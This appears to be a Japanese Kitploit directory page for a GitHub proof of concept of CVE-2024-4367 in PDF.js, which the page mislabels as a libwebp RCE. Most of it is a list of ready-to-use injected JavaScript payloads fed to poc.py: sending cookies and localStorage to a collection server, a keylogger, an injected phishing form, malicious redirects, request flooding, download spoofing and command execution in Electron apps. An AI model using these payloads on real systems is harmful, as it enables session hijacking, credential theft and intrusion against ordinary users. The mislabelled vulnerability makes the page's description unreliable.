Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4367-POC-PDFJS — CVE-2024-4367のPoC(Proof of Concept) - libwebpにおけるRCE脆弱性。完全なデモンストレーションを含む:ペイロード作成、攻撃シナリオ、リスク分析、テスト用Express.jsサーバー。 | Kitploit
ツール/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
フィッシングツールペイロード生成エクスプロイトウェブアプリケーション悪用データ流出ソーシャルエンジニアリング学習と教育
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

CVE-2024-4367-POC-PDFJS

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4367のPoC(Proof of Concept) - libwebpにおけるRCE脆弱性。完全なデモンストレーションを含む:ペイロード作成、攻撃シナリオ、リスク分析、テスト用Express.jsサーバー。

リポジトリを見る
161年前未レビュー

CVE 2024 4367: XSS(クロスサイトスクリプティング)エクスプロイトのPoC

1. アラート表示(XSSの発動)

攻撃が機能するか確認するために、単純なアラートメッセージを注入する別の例。

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • 説明: このコードはページにアラートポップアップを注入し、XSSエクスプロイトがターゲットサイトで実行されているかどうかを素早くテストできます。

2. クッキーの窃取

XSS攻撃は、被害者のクッキーを盗み出し、悪意のあるサーバーに送信するために使用される可能性があります。

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • 説明: スクリプトはページのURLを変更して被害者のクッキーを含め、それらを悪意のあるサーバー(http://localhost:3000/cookie)に送信します。

3. ローカルストレージデータの窃取(LocalStorage)

攻撃者は、認証データやセッション情報など、被害者のlocalStorageに保存された機密情報を盗むことができます。

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • 説明: このコードはlocalStorageに保存された機密データを取得し、fetchリクエストを介して悪意のあるサーバーに送信します。

4. 悪意のあるリダイレクト

攻撃者は、被害者を悪意のあるサイトにリダイレクトして、追加情報を収集したり、別のエクスプロイトをロードしたりする可能性があります。

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • 説明: このスクリプトは被害者を即座に悪意のあるサイトにリダイレクトします。これはフィッシング攻撃やマルウェアのインストールに使用される可能性があります。

5. DDoS攻撃(APIフラッディング)

別のタイプの攻撃は、サーバーにリクエストを殺到させ、パフォーマンスの低下やサービスの中断を引き起こす可能性があります。

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • 説明: スクリプトはターゲットAPIに100件のHTTPリクエストを送信し、サーバー過負荷(サービス拒否攻撃)を引き起こす可能性があります。

6. キーロガー(キーストロークの窃取)

攻撃者は被害者のキー入力を傍受し、パスワードやユーザーIDなどの機密情報を取得できます。

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • 説明: このスクリプトは被害者が入力したすべてのキーを記録し、その情報を悪意のあるサーバーに送信します。

7. 注入フォームによるフィッシング(機密データの窃取)

攻撃者はXSSを使用してWebページにフィッシングフォームを注入し、機密情報(例:パスワード、ユーザー名)を盗むことができます。

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • 説明: このコードはページにフォームを注入し、攻撃者がこのフィッシングフォームを通じてユーザーが送信した機密情報を取得できるようにします。

8. なりすまし

ユーザーがダウンロードボタンをクリックした場合、ダウンロード先を変更します。

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • 説明: このスクリプトはダウンロードURLのリンクを更新します。アイデアは、既存のボタンを変更して、ユーザーが意図したものではなく悪意のあるファイルをダウンロードさせることです。

9. デスクトップアプリケーションへの攻撃(Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

ElectronやNW.jsなどのフレームワークに基づくアプリケーションもXSS攻撃の影響を受ける可能性があります。これらのフレームワークは、拡張されたローカルアクセス権を持つデスクトップアプリケーションにWebコンテンツを統合できるからです。 これらのアプリケーションは、その権限により、攻撃者がローカルファイルにアクセスしたり、外部プロセスを実行したり、ターゲットマシン上で他のアプリケーション(例:電卓、テキストエディタなど)を起動したりすることを許可する可能性があります。これにより、攻撃対象領域が大幅に増加します。これらのアプリケーションは、Webの力とより広範なシステムアクセスを組み合わせているためです。


結論

CVE(Common Vulnerabilities and Exposures)を悪用した攻撃により、さまざまなタイプのXSS攻撃が実行される可能性があります。Webアプリケーションやデスクトップアプリケーションの特定の脆弱性を悪用することで、攻撃者は悪意のあるコードを注入し、機密情報を盗み、ユーザーセッションを操作し、ターゲットシステム上で悪意のあるアクションを実行することができます。

ツールをダウンロード